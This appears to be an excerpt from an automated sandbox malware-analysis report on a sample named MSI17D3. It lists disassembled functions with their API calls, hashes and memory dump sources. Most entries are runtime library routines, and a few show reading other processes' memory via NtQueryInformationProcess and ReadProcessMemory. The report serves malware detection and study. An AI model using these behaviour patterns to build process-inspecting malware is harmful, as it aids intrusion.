                                                                                                                                                                                • Instruction Fuzzy Hash: 80B1807250010AAFCF19DFA8C9D5FFE3BB9EB09340F19411DFA1AA6252D631DA10DB61
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00CC855C
                                                                                                                                                                                • _Maklocstr.LIBCPMT ref: 00CC85C5
                                                                                                                                                                                • _Maklocstr.LIBCPMT ref: 00CC85D7
                                                                                                                                                                                • _Maklocchr.LIBCPMT ref: 00CC85EF
                                                                                                                                                                                • _Maklocchr.LIBCPMT ref: 00CC85FF
                                                                                                                                                                                • _Getvals.LIBCPMT ref: 00CC8621
                                                                                                                                                                                  • Part of subcall function 00CC1CD4: _Maklocchr.LIBCPMT ref: 00CC1D03
                                                                                                                                                                                  • Part of subcall function 00CC1CD4: _Maklocchr.LIBCPMT ref: 00CC1D19
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                                                                                                                                • String ID: false$true
                                                                                                                                                                                • API String ID: 3549167292-2658103896
                                                                                                                                                                                • Opcode ID: 29999372279a6958b9ac9bf8065a5156cbe454af70634ffbb6a81e14fbed64eb
                                                                                                                                                                                • Instruction ID: fee01598ffe36f789956a5ebd3185c8c0330fe1f488730bf0bc7ee7a19810f90
                                                                                                                                                                                • Opcode Fuzzy Hash: 29999372279a6958b9ac9bf8065a5156cbe454af70634ffbb6a81e14fbed64eb
                                                                                                                                                                                • Instruction Fuzzy Hash: 152141B1D00314AADF14EFA5D885FDF7BA8AF05710F04815AFD149F286DA708A44DBA1
                                                                                                                                                                                APIs
                                                                                                                                                                                • std::locale::_Init.LIBCPMT ref: 00CB9763
                                                                                                                                                                                  • Part of subcall function 00CC0C94: __EH_prolog3.LIBCMT ref: 00CC0C9B
                                                                                                                                                                                  • Part of subcall function 00CC0C94: std::_Lockit::_Lockit.LIBCPMT ref: 00CC0CA6
                                                                                                                                                                                  • Part of subcall function 00CC0C94: std::locale::_Setgloballocale.LIBCPMT ref: 00CC0CC1
                                                                                                                                                                                  • Part of subcall function 00CC0C94: std::_Lockit::~_Lockit.LIBCPMT ref: 00CC0D17
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CB978A
                                                                                                                                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00CB97F0
                                                                                                                                                                                • std::locale::_Locimp::_Makeloc.LIBCPMT ref: 00CB984A
                                                                                                                                                                                  • Part of subcall function 00CBF57A: __EH_prolog3.LIBCMT ref: 00CBF581
                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00000000,?,00D054B1,00000000), ref: 00CB99BF
                                                                                                                                                                                • __cftoe.LIBCMT ref: 00CB9B0B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockitstd::locale::_$H_prolog3Lockit::_$FreeInitLocalLocimp::_Locinfo::_Locinfo_ctorLockit::~_MakelocSetgloballocale__cftoe
                                                                                                                                                                                • String ID: bad locale name
                                                                                                                                                                                • API String ID: 3578231455-1405518554
                                                                                                                                                                                • Opcode ID: 44b6731fc1445879b7694b93506ae10137e13abecdac6a9c17af501b3ca35614
                                                                                                                                                                                • Instruction ID: ef8a10b7626d430cc8b5832baa731017913704f5862d201cb5932379bc1fd8f0
                                                                                                                                                                                • Opcode Fuzzy Hash: 44b6731fc1445879b7694b93506ae10137e13abecdac6a9c17af501b3ca35614
                                                                                                                                                                                • Instruction Fuzzy Hash: EFF1B071D01248DFDF14CFA8D985BEEBBB5EF09304F244169E915AB381E7369A04CBA1
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00CB36D0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00CB3735
                                                                                                                                                                                  • Part of subcall function 00CB36D0: _wcschr.LIBVCRUNTIME ref: 00CB37C6
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 00CB3CA8
                                                                                                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,000001D8,00000000,00000000,00000018,00000000), ref: 00CB3D01
                                                                                                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00000048,00000000,?,000001D8,00000000,00000000,00000018,00000000), ref: 00CB3D7A
                                                                                                                                                                                • ReadProcessMemory.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,?,?,?,00000048,00000000,?,000001D8), ref: 00CB3EB1
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00CB3F34
                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 00CB3F7B
                                                                                                                                                                                Strings
                                                                                                                                                                                • NtQueryInformationProcess, xrefs: 00CB3CA2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MemoryProcessRead$AddressDirectoryErrorFreeLastLibraryProcSystem_wcschr
                                                                                                                                                                                • String ID: NtQueryInformationProcess
                                                                                                                                                                                • API String ID: 566592816-2781105232
                                                                                                                                                                                • Opcode ID: 8ab1fb23e7a6d2e8ce1dc190729259345d1907671bed1aa07ba92fc24f8f7e75
                                                                                                                                                                                • Instruction ID: 3185c9762a221559d6f6bc87416e5a727188f89b831d73978f60b1c7cf5282fd
                                                                                                                                                                                • Opcode Fuzzy Hash: 8ab1fb23e7a6d2e8ce1dc190729259345d1907671bed1aa07ba92fc24f8f7e75
                                                                                                                                                                                • Instruction Fuzzy Hash: 09A14B70904659DEDB20CF64CC59BEEBBF4EF48304F204599D549A7280EBB5AA88CF51
                                                                                                                                                                                APIs
                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,40000022,665E9022,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00CB4154
                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,3FFFFFFF,665E9022,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00CB4177
                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00CB4217
                                                                                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,665E9022,?,?,?), ref: 00CB42D2
                                                                                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,665E9022,?,?,?), ref: 00CB42F3
                                                                                                                                                                                • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,665E9022,?,?,?), ref: 00CB4326
                                                                                                                                                                                • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,665E9022,?,?,?), ref: 00CB4337
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,665E9022,?,?,?), ref: 00CB4355
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,665E9022,?,?,?), ref: 00CB4371
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Process$Local$AllocCloseHandleOpenTimes$Free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1424318461-0
                                                                                                                                                                                • Opcode ID: e0a46672c9b3fe3a0b7dc07d6e52ae92ccbe51c0aaad143d917cb5631adad0d5
                                                                                                                                                                                • Instruction ID: eea511b20b743c6a706d7c72a2e761c5f71f403a94bd6a441b67f2da9a67ea79
                                                                                                                                                                                • Opcode Fuzzy Hash: e0a46672c9b3fe3a0b7dc07d6e52ae92ccbe51c0aaad143d917cb5631adad0d5
                                                                                                                                                                                • Instruction Fuzzy Hash: C7818F71E042059FDB18CFA8D985BEEBBB5FB48310F244229E925E73D1D770AA01CB95
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCPInfo.KERNEL32(?,?), ref: 00CD26F8
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00CD2786
                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00CD27B0
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00CD27F8
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00CD2812
                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00CD2838
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00CD2875
                                                                                                                                                                                • CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00CD2892
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3603178046-0
                                                                                                                                                                                • Opcode ID: dd808ae0e80cfc499c9b6d1618310b093cc790b9f14f989998f11e57c0a50fe9
                                                                                                                                                                                • Instruction ID: 0d21b85d4f4ae67fdf1c6eab750364a0ad408f411f3f3b3934297e75cea353d4
                                                                                                                                                                                • Opcode Fuzzy Hash: dd808ae0e80cfc499c9b6d1618310b093cc790b9f14f989998f11e57c0a50fe9
                                                                                                                                                                                • Instruction Fuzzy Hash: 5971A5329002469FDF219F65CC81AEE7BB6EF65350F25011BFA24A7390DB31CA41EB60
                                                                                                                                                                                APIs
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00CD21A3
                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00CD21CF
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00CD220E
                                                                                                                                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CD222B
                                                                                                                                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00CD226A
                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00CD2287
                                                                                                                                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CD22C9
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00CD22EC
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2040435927-0
                                                                                                                                                                                • Opcode ID: d54f927bb851a392a1f624f7874be307e806d2f5a66177b521d7613e94787ed7
                                                                                                                                                                                • Instruction ID: 999277f7ec4cda18e3d46f8eaab7a225af1c33bad2f5626d7b9b122a23aaacfe
                                                                                                                                                                                • Opcode Fuzzy Hash: d54f927bb851a392a1f624f7874be307e806d2f5a66177b521d7613e94787ed7
                                                                                                                                                                                • Instruction Fuzzy Hash: 8F51BF7290020ABBEF204F65CC45FAF7BA9EF64750F11412AFB25A6260DB34DE10DB60
                                                                                                                                                                                APIs
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CB8657
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CB8679
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CB86A1
                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000044,00000000,665E9022,?,00000000), ref: 00CB86F9
                                                                                                                                                                                • __Getctype.LIBCPMT ref: 00CB877B
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CB87E4
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CB880E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2372200979-0
                                                                                                                                                                                • Opcode ID: c4c3be575cb54916369de70735da3df32ad51b7135bf6732e32597b661d60d16
                                                                                                                                                                                • Instruction ID: fc3f6e12dd045df78c80343932184fbb34b0e67ae15b708e3c8894916b7281af
                                                                                                                                                                                • Opcode Fuzzy Hash: c4c3be575cb54916369de70735da3df32ad51b7135bf6732e32597b661d60d16
                                                                                                                                                                                • Instruction Fuzzy Hash: AB61B1B1D00644DFDB11CF68C940BAABBF4EF14314F24825DE859AB391EB31AA45CB91
                                                                                                                                                                                APIs
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CB92A0
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CB92C2
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CB92EA
                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000018,00000000,665E9022,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00CB9342
                                                                                                                                                                                • __Getctype.LIBCPMT ref: 00CB93BD
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CB93F8
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CB9422
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2372200979-0
                                                                                                                                                                                • Opcode ID: 752c03a37953891d39ad33aa30353f2da598205ae585a42c247ba681617e6c5d
                                                                                                                                                                                • Instruction ID: 38e0f14ffc36b416fbbbc3003717c234477e18dd1d9df68f8bc9e4b3e4055bf7
                                                                                                                                                                                • Opcode Fuzzy Hash: 752c03a37953891d39ad33aa30353f2da598205ae585a42c247ba681617e6c5d
                                                                                                                                                                                • Instruction Fuzzy Hash: 2451BC70904218DFCB11CFA8C444BEEBBF4EF14714F20825DE95AAB3A1D774AA41DBA1
                                                                                                                                                                                APIs
                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00CD3F57
                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00CD3F5F
                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00CD3FE8
                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00CD4013
                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00CD4068
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                                                                                • Opcode ID: 248669159106ebb00029ea0d6b160a5ba838abba7d788443f4aa04e26368797a
                                                                                                                                                                                • Instruction ID: 92c0f717658587ebd4a79eecd40391f8f74c3420fe4a6e5dad689b845e51f6da
                                                                                                                                                                                • Opcode Fuzzy Hash: 248669159106ebb00029ea0d6b160a5ba838abba7d788443f4aa04e26368797a
                                                                                                                                                                                • Instruction Fuzzy Hash: A5418334E0024D9BCF10DFA8C885A9EBBB5EF45314F148196EA149B392D731EB05CB92
                                                                                                                                                                                APIs
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00CE7408,00CE3841,0000000C,?,00000000,00000000,?,00CE7632,00000021,FlsSetValue,00CFBD58,00CFBD60,?), ref: 00CE73BC
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                • API String ID: 3664257935-537541572
                                                                                                                                                                                • Opcode ID: 2ae2436438983eb7382eed3a67b0807bf60619c1bd59c3e73065893998719b0f
                                                                                                                                                                                • Instruction ID: 113e04498c88fd15eb38d380eceae36415b022fc9436094f0f2d5348067c45a9
                                                                                                                                                                                • Opcode Fuzzy Hash: 2ae2436438983eb7382eed3a67b0807bf60619c1bd59c3e73065893998719b0f
                                                                                                                                                                                • Instruction Fuzzy Hash: A1212731A09291EBDB619B66DC45B6E37699F41760F240710FD25E73E0E730EE00E6E1
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CC8970
                                                                                                                                                                                • ctype.LIBCPMT ref: 00CC89B7
                                                                                                                                                                                  • Part of subcall function 00CC851C: __Getctype.LIBCPMT ref: 00CC852B
                                                                                                                                                                                  • Part of subcall function 00CC270D: __EH_prolog3.LIBCMT ref: 00CC2714
                                                                                                                                                                                  • Part of subcall function 00CC270D: std::_Lockit::_Lockit.LIBCPMT ref: 00CC271E
                                                                                                                                                                                  • Part of subcall function 00CC270D: std::_Lockit::~_Lockit.LIBCPMT ref: 00CC278F
                                                                                                                                                                                  • Part of subcall function 00CBF3D9: __EH_prolog3.LIBCMT ref: 00CBF3E0
                                                                                                                                                                                  • Part of subcall function 00CBF3D9: std::_Lockit::_Lockit.LIBCPMT ref: 00CBF3EA
                                                                                                                                                                                  • Part of subcall function 00CBF3D9: std::_Lockit::~_Lockit.LIBCPMT ref: 00CBF48E
                                                                                                                                                                                  • Part of subcall function 00CC2837: __EH_prolog3.LIBCMT ref: 00CC283E
                                                                                                                                                                                  • Part of subcall function 00CC2837: std::_Lockit::_Lockit.LIBCPMT ref: 00CC2848
                                                                                                                                                                                  • Part of subcall function 00CC2837: std::_Lockit::~_Lockit.LIBCPMT ref: 00CC28B9
                                                                                                                                                                                  • Part of subcall function 00CBF3D9: Concurrency::cancel_current_task.LIBCPMT ref: 00CBF499
                                                                                                                                                                                  • Part of subcall function 00CC29F6: __EH_prolog3.LIBCMT ref: 00CC29FD
                                                                                                                                                                                  • Part of subcall function 00CC29F6: std::_Lockit::_Lockit.LIBCPMT ref: 00CC2A07
                                                                                                                                                                                  • Part of subcall function 00CC29F6: std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2A78
                                                                                                                                                                                  • Part of subcall function 00CC2961: __EH_prolog3.LIBCMT ref: 00CC2968
                                                                                                                                                                                  • Part of subcall function 00CC2961: std::_Lockit::_Lockit.LIBCPMT ref: 00CC2972
                                                                                                                                                                                  • Part of subcall function 00CC2961: std::_Lockit::~_Lockit.LIBCPMT ref: 00CC29E3
                                                                                                                                                                                • collate.LIBCPMT ref: 00CC8B05
                                                                                                                                                                                • numpunct.LIBCPMT ref: 00CC8DAF
                                                                                                                                                                                • __Getcoll.LIBCPMT ref: 00CC8B47
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                  • Part of subcall function 00CB6330: LocalAlloc.KERNEL32(00000040,?,00CC0E04,00000020,?,?,00CB9942,00000000,665E9022,?,?,?,?,00CF50DD,000000FF), ref: 00CB6336
                                                                                                                                                                                • codecvt.LIBCPMT ref: 00CC8E6D
                                                                                                                                                                                  • Part of subcall function 00CC2E09: __EH_prolog3.LIBCMT ref: 00CC2E10
                                                                                                                                                                                  • Part of subcall function 00CC2E09: std::_Lockit::_Lockit.LIBCPMT ref: 00CC2E1A
                                                                                                                                                                                  • Part of subcall function 00CC2E09: std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2E8B
                                                                                                                                                                                  • Part of subcall function 00CC2F33: __EH_prolog3.LIBCMT ref: 00CC2F3A
                                                                                                                                                                                  • Part of subcall function 00CC2F33: std::_Lockit::_Lockit.LIBCPMT ref: 00CC2F44
                                                                                                                                                                                  • Part of subcall function 00CC2F33: std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2FB5
                                                                                                                                                                                  • Part of subcall function 00CC22FA: __EH_prolog3.LIBCMT ref: 00CC2301
                                                                                                                                                                                  • Part of subcall function 00CC22FA: std::_Lockit::_Lockit.LIBCPMT ref: 00CC230B
                                                                                                                                                                                  • Part of subcall function 00CC22FA: std::_Lockit::~_Lockit.LIBCPMT ref: 00CC237C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_$AllocConcurrency::cancel_current_taskGetcollGetctypeLocalcodecvtcollatectypenumpunct
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3494022857-0
                                                                                                                                                                                • Opcode ID: 533b9af9efbb920d892d1136ae5e3af7b1494d1e905020aeb3a65b3cccc311ed
                                                                                                                                                                                • Instruction ID: 64027c80bff9577a3fe73064a1a8ae6680dcb4b8aa50b3c0ebb67ec13da07bb0
                                                                                                                                                                                • Opcode Fuzzy Hash: 533b9af9efbb920d892d1136ae5e3af7b1494d1e905020aeb3a65b3cccc311ed
